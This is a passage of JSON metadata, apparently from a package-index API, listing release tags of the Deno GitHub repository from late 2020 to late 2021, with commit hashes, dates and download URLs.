m/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/